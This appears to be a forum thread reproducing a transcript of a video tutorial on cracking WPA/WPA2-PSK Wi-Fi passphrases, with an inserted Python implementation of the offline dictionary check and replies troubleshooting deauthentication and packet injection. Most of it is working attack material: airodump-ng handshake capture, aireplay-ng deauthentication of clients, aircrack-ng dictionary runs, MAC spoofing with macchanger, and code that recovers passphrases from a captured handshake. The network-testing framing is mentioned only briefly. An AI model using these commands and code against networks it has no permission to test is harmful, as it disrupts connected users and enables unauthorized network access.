Here is my submission of Xploitz WPA cracking vid #3.
I was too lazy to re-type all of it, so I took some screenshots during the video, printed them, and then used an OCR program to create the txt file.
Enjoy.
Nice. Thanks for taking the time to do that. There were a few errors within the transcript, mainly because the OCR program that was used mixed up the number 1 with the letter l (and vice versa) and the number 0 with a Q, so ath0 was turned into athQ. I however demand accuracy with my tutorials...
So here is my edited and revised copy of this transcript, not for download, but for online viewing. Feel free though to copy and paste it to Windows Notepad or Linux's KWrite. :) Thanks again {In}Secure for posting.
Code:
-=Xploitz=- E-Z Video Tutorial: Cracking WPA/WPA2
Date of video: August 09, 2007
Hello everyone, :)
Welcome once again to another great E-Z VIDEO Tutorial taught
to you by your newly appointed remote-exploit.org Moderator,
me....-=Xploitz=-
This time we're gonna step it up a little bit and try our hand at our
WPA/WPA2 TKIP or TKIP+AES network. What's the difference
between cracking a WPA network -VS- a WPA2 network??
Answer...ABSOLUTELY NOTHING!! There is no difference between
cracking WPA or WPA2 networks at all. In order to SUCCESSFULLY
crack any WPA/WPA2 network, there are 2 main key things that
must happen. (1) YOU MUST CAPTURE THE FULL 4 WAY
HANDSHAKE!! AIRODUMP-NG WILL LET YOU KNOW BY TELLING
YOU. IF YOU LOOK AT THE TOP RIGHT HAND CORNER OF YOUR
AIRODUMP-NG SCREEN IT WILL REGISTER AND LET YOU KNOW BY
SAYING "[ WPA handshake: 00:18:F8:B5:F2:D6 ]". (2) YOUR
PASSPHRASE MUST BE IN THE DICTIONARY YOU CHOSE IN
ORDER TO SUCCESSFULLY BRUTE FORCE IT WITH AIRCRACK-NG.
***SPECIAL NOTE!!!***
IF YOUR NETWORK IS ENCRYPTED WITH WPA/WPA2 +AES.....
COWPATTY WILL NOT WORK. COWPATTY ONLY WORKS
WITH TKIP. That's why I'm using aircrack-ng to crack my
WPA2/TKIP+AES network. NOW THAT THAT'S BEEN SAID,
...LET'S BEGIN SHALL WE??
First off, we're gonna put our interface into monitor mode.
To accomplish this we type in...
airmon-ng stop <device>
My device is Atheros chipped so it would look like...
airmon-ng stop ath0
Next, we type in...
airmon-ng start <device>
Again, my card is an Atheros chipped card so I'll use ath0 to
place my ath0 interface into monitor mode. Other devices
may only be required to use eth0, wlan0 etc... So for mine it's...
airmon-ng start ath0
Start airodump-ng to collect the authentication handshake.
If you don't know your network's details, just type in...
airodump-ng <device>
mine will look like...
airodump-ng ath0
After you run airodump-ng and you see your network and
its connected client(s),
press ^c (that's Ctrl+c).
This action will break you out of airodump-ng's process and
give you a new command line. Use this when you want to
switch back and forth to copy and paste your network's details.
Now, open a new shell window and fill in all your network's
info so that we can focus on only your network and lock
onto it. To do this you'll type...
airodump-ng -c (Channel your AP is on) -w (file name) --bssid (your APS bssid here) <device>
Mine looks like...
airodump-ng -c 6 -w psk --bssid 00:18:F8:B5:F2:D6 ath0
***Important***Do NOT use the --ivs option.
You must capture the full packets!
Use Aireplay-ng to de-authenticate the wireless client
To accomplish this we type in...
aireplay-ng -0 1 -a <AP MAC> -c <Client's MAC> <Device>
Mine looks like this...
aireplay-ng -0 1 -a 00:18:F8:B5:F2:D6 -c 08:14:A5:F6:83:E3 ath0
You'll know your attack was successful if your
airodump-ng screen looks similar to this...
CH  6 ][ Elapsed: 2 mins ][ -08-08 14:37 ][ WPA handshake: 00:18:F8:B5:F2:D6
BSSID              PWR RXQ  Beacons  #Data  #/s  CH  MB  ENC   CIPHER  AUTH  ESSID
00:18:F8:B5:F2:D6   68      1298     645    3    6   48  WPA2  CCMP    PSK   XploitZ
BSSID              STATION            PWR  Rate   Lost  Packets  Probes
00:18:F8:B5:F2:D6  08:14:A5:F6:83:E3   56  54-54  0     1019
Notice the [ WPA handshake: 00:18:F8:B5:F2:D6 ] in the upper
part of the above text?? This confirms that you have captured
the complete 4-way handshake. ;)
***IMPORTANT NOTE!!***
If there is not a client connected, and you suspect there
is one connected, just type in
aireplay-ng -0 1 -a <BSSID> <Device>
And they'll appear if they're connected!
OPEN A NEW SHELL
Run aircrack-ng to crack the pre-shared key.
To do this we type in the command...
aircrack-ng -w password.lst -b <AP's BSSID HERE> filename.cap
Mine looks like this,..
aircrack-ng -w algae.txt -b 00:18:F8:B5:F2:D6 psk*.cap
You can use .txt or .lst dictionaries. It doesn't matter which
type of dictionary you use. Just make sure if your dictionary is
called passwords.lst, you type in passwords.lst and not .txt.
Also, your pass-phrase MUST BE IN THE DICTIONARY FOR
THIS ATTACK TO WORK!! Also please note that my dictionary
is located in my home folder or /root directory, therefore there is
no need to type in the full path to my dictionary. ;) There are
other methods including the use of a pre-compiled list of
passwords with your ESSID, but this particular tutorial will NOT
cover it. I will do another video explaining step by step all the
correct processes you need to build a database and pre-compile
it with your ESSID and password list in the very near future.
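What aircrack-ng is actually doing in that last step, as an added example (Python, not code from the video or from the aircrack-ng project): for each dictionary word it derives the PMK with PBKDF2 over the passphrase and ESSID, expands it to the PTK with the two MAC addresses and the two nonces from the handshake, and recomputes the MIC of EAPOL message 2 with the first 16 bytes of the PTK (the KCK). A match means the word is the passphrase; that is why both the full handshake and a dictionary that contains the passphrase are required. The AP and client MACs and the ESSID are taken from the airodump-ng screen above; the nonces and the EAPOL frame are constructed here since no real capture is on the page, and the passphrase used in the fixture is the one named later in the thread. The MIC algorithm is picked from the Key Descriptor Version bits of the captured frame (HMAC-MD5 for version 1, used with TKIP; HMAC-SHA1 truncated to 128 bits for version 2, used with CCMP/AES), so the same check covers both cipher suites.

```python
"""Offline WPA/WPA2-PSK verification, as done per dictionary word once the
four-way handshake is in the .cap file.  Added example, not code from the
video or from aircrack-ng."""
import hashlib
import hmac
import struct
from dataclasses import dataclass
from typing import Iterable, Optional

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# 4 (EAPOL hdr) + 1 (desc type) + 2 (key info) + 2 (key len) + 8 (replay ctr)
# + 32 (nonce) + 16 (IV) + 8 (RSC) + 8 (ID) = 81
MIC_OFFSET = 81


@dataclass
class Handshake:
    """Everything the cracker needs from messages 1 and 2 of the handshake."""
    ssid: str
    ap_mac: bytes    # AA, 6 bytes
    sta_mac: bytes   # SPA, 6 bytes
    anonce: bytes    # from message 1, 32 bytes
    snonce: bytes    # from message 2, 32 bytes
    eapol: bytes     # complete EAPOL-Key frame of message 2, MIC still inside


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes): the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max MACs || min/max nonces); KCK = PTK[0:16]."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the frame with its MIC field zeroed; algorithm chosen by Key Descriptor Version."""
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:                                      # TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                      # CCMP (AES): HMAC-SHA1-128
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")


def passphrase_matches(hs: Handshake, candidate: str) -> bool:
    """True if `candidate` reproduces the MIC captured in message 2."""
    pmk = pmk_from_passphrase(candidate, hs.ssid)
    kck = kck_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
    captured_mic = hs.eapol[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol), captured_mic)


def dictionary_attack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first word that verifies against the handshake, else None."""
    for word in wordlist:
        word = word.strip()
        if word and passphrase_matches(hs, word):
            return word
    return None


def build_test_handshake(passphrase: str, ssid: str,
                         key_descriptor_version: int = 2) -> Handshake:
    """Constructed fixture (no real capture): MACs from the tutorial's airodump-ng
    screen, fixed nonces, and a message-2 frame whose MIC is derived from `passphrase`."""
    ap_mac = bytes.fromhex("0018f8b5f2d6")
    sta_mac = bytes.fromhex("0814a5f683e3")
    anonce = bytes(range(32))                      # arbitrary but fixed
    snonce = bytes(range(32, 64))
    key_info = 0x0108 | key_descriptor_version     # Key MIC + Pairwise bits + version
    body = (bytes([2]) + struct.pack(">H", key_info) + struct.pack(">H", 0)
            + (1).to_bytes(8, "big")               # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + b"\x00" * 16                         # MIC placeholder
            + struct.pack(">H", 0))                # no key data
    eapol = bytes([1, 3]) + struct.pack(">H", len(body)) + body
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, eapol)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce,
                     eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:])


if __name__ == "__main__":
    hs = build_test_handshake("-=Xploitz=-", "XploitZ")
    print(dictionary_attack(hs, ["123456", "password", "-=Xploitz=-"]))
```

Nearly all of the time per candidate goes into the 4096 HMAC-SHA1 iterations of PBKDF2, which depend only on the passphrase and the ESSID and not on the captured handshake. That is what the pre-compiled per-ESSID list mentioned above saves: the PMKs are computed once, and checking a new handshake for that ESSID is then just the cheap PRF and MIC step.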
It's ok
card: Alfa AWUS036H
chipset: rtl8187
Unplug Alfa
Boot VMware
Plug in Alfa
Code:
cd rtl8187_linux_26.1010.0622.2006
sh wlan0up
New shell
Code:
sh wlan0up
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0 1
airodump-ng -c 1 -w psk --bssid [BSSID_AP] wlan0
Code:
aireplay-ng -0 1 -a [BSSID_AP] -c [BSSID_CLIENT] wlan0
Sending DeAuth to station -- STMAC: [BSSID_CLIENT]
but no handshake
PWR: about 50
CH: 1
ENC: WPA
CIPHER: TKIP
AUTH: PSK
ESSID: AOLbox***
Try doing -0 5 instead of -0 1 in your deauth command. You're close to the AP and the client, correct? You MUST BE CLOSE TO BOTH, not just the AP. It's different than in cracking WEP, where you only need to be close to the AP.
BTW... why are you using macchanger for WPA/WPA2??? :confused: It's not needed since you're not using your card to connect or associate/authenticate with the AP.
I reach 60 at the maximum PWR for the AP.
I reach 35 at the maximum PWR for the CLIENT.
If I use another card on Windows XP and try to connect to the AP, in VMware I can see another client (me) with a power of -1. But the command
Code:
aireplay-ng -0 1 -a [BSSID_AP] -c [MY_BSSID_CLIENT] wlan0
gives nothing.
I tried -0 0 too.
EDIT: I have already tried 1.0-dev, but I was farther away when I tried 1.0-dev.
I will try again.
Have you updated to the most recent version of aircrack??
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
cd aircrack-ng
make
make install
I tried both versions of aircrack.
With 1.0-dev, instead of
Code:
[ WPA handshake 00:18:F8:B5:F2:D6 ]
(in your tuto), I see this message:
Code:
[ 140 bytes keystream: [BSSID_AP]
Don't use 1.0-dev for this. Use my posted svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
I say use that because there was an issue with the aircrack-ng dictionary capitals and special letters not working out right. Example: my passphrase was -=Xploitz=-. I had -=Xploitz=- in my dictionary, but because of the -==- in my passphrase, aircrack 1.0-dev wouldn't read it right. So please use the above version instead. Don't know if it will fix your problem or not, but it's worth a shot.
Do me a favor: test to see if you're on the same channel as the AP. Right before you enter your aireplay-ng -0 1 ... etc. command, do an ifconfig wlan0 and an iwconfig wlan0 to verify you're on the same channel. I'm starting to run out of solutions to help you. Have you updated your card's drivers as well??
Try to see if your card is capable of injecting...
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 -i wlan0 ath0
Where:
IMPORTANT: You must set your card to the desired channel with airmon-ng prior to running any of the tests.
- -9 means injection test. Long form is --test. (Double dash)
- -e teddy is the network name (SSID). This is optional.
- -a 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is optional.
- -i wlan0 is interface name of the second card if you want to determine which attacks your card supports. This is optional.
- ath0 is the interface name or airserv-ng IP Address plus port number. For example - 127.0.0.1:666. (Mandatory)
First, I think I already have the best version of aircrack.
Mine is in /modules/aircrack_0.91.lzm
On the page:
Code:
http://forums.remote-exploit.org/showthread.php?t=6784
I have the version of 25/Jun/2007.
Do I have to download this version?:
Code:
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
Secondly, I do the test:
Code:
airmon-ng start wlan0 1
aireplay-ng -9 wlan0
00:14:6C:7E:40:80 - channel 1 - "teddy"
Ping: 2ms/25/49
28/30 93%
EDIT: I will try the latest version for my Alfa (*Update 26/Jun/2007).
EDIT2: I have a question, Xploitz.
When I type
Code:
aircrack-ng -w pass psk*.cap
I can see:
Code:
Encryption
WEP (**IVs)
But it's a WPA key for airodump-ng. Have you got an explanation?
Thanks.
EDIT3: So I try to do
Code:
aireplay-ng -1 1 -e teddy -a [AP_BSSID] -h [CLIENT_BSSID] wlan0
but I have something like that:
Quote:
18:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request
I don't think that is good.
EDIT4:
With the latest version for the Alfa and aircrack 0.9.1svn499:
Code:
aircrack-ng -w pass psk*.cap
I can see:
Code:
Encryption
WPA (0 handshake)
It's better than WEP (**IVs).
-=Xploitz=-
WOW, this is a great video. I am a noobie, and for me it was wonderful. Very clear and concise.
The one thing I was a little off about was having to have my WPA key in the password list. Wouldn't that defeat the purpose of really testing a network? I want to test my network or a client's network, but if I already knew their passcode then it is like "cheating".
Have you done a video to try to crack a WPA without knowing the passcode?
Either way, your tuts are always very easy for me to follow.
Thank you. Keep up the awesome work.